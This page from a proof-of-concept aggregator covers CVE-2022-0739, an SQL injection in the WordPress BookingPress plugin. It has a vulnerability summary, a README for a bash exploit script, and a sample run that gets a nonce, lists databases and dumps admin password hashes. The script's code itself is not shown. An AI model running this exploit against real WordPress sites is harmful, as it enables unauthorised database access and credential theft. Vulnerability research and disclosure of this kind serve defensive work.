POC详情: 973b4c731c7ea326b2f80a1896071c80235a7859

来源
https://github.com/Chris01s/CVE-2022-0739
关联漏洞
标题: WordPress plugin BookingPress SQL注入漏洞 (CVE-2022-0739)
描述:WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是WordPress开源的一个应用插件。 WordPress plugin BookingPress 1.0.11 版本之前存在SQL注入漏洞,该漏洞源于通过 AJAX 请求 bookingpress_front_get_category_services 函数操作用于动态构建的 SQL 查询之前,没有正确清理用户提供的 POST 数据。
描述
Simple bash script to automate the exploit of cve 2022 0739
介绍
# CVE-2022-0739
Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)

#Usage
Supply the URL to where the Booking Press plugin is in use on the application.

bash exploit.sh '<insert url here>'

e.g.  (Hashes are redacted in this demo) 



  				                                                           
		
			
		┌──(user@user)-[~/]
		└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
		    ____              __   _             ____                     
		   / __ )____  ____  / /__(_)___  ____ _/ __ \________  __________
		  / __  / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
		 / /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ /  /  __(__  |__  ) 
		/_____/\____/\____/_/|_/_/_/ /_/\__, /_/   /_/   \___/____/____/  
				               /____/                             
		   _______    ________    ___   ____ ___  ___        ____  __________ ____ 
		  / ____/ |  / / ____/   |__ \ / __ \__ \|__ \      / __ \/__  /__  // __ \
		 / /    | | / / __/________/ // / / /_/ /__/ /_____/ / / /  / / /_ </ /_/ /
		/ /___  | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ /  / /___/ /\__, / 
		\____/  |___/_____/    /____/\____/____/____/     \____/  /_//____//____/  
	
		[+] Exploiting http://localhost ...
		[+] Vulnerable url at http://localhost/calendar/...
		[+] Gettting nonce...
		[+] Found nonce: 219087f4c2
		[+] Extract database name...

		information_schema
		test_db


		[+] Getting creds...
		admin $P$BGrGrgXXXXXXXXXXXXXX
		testUs3r $P$B4aNM28NXXXXXXXXXXX
  
---------------------------------------------------------------------

DISCLAIMER

Usage of this program without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
文件快照

 [4.0K]  /data/pocs/973b4c731c7ea326b2f80a1896071c80235a7859
├── [1.3K]  exploit.sh
└── [1.8K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。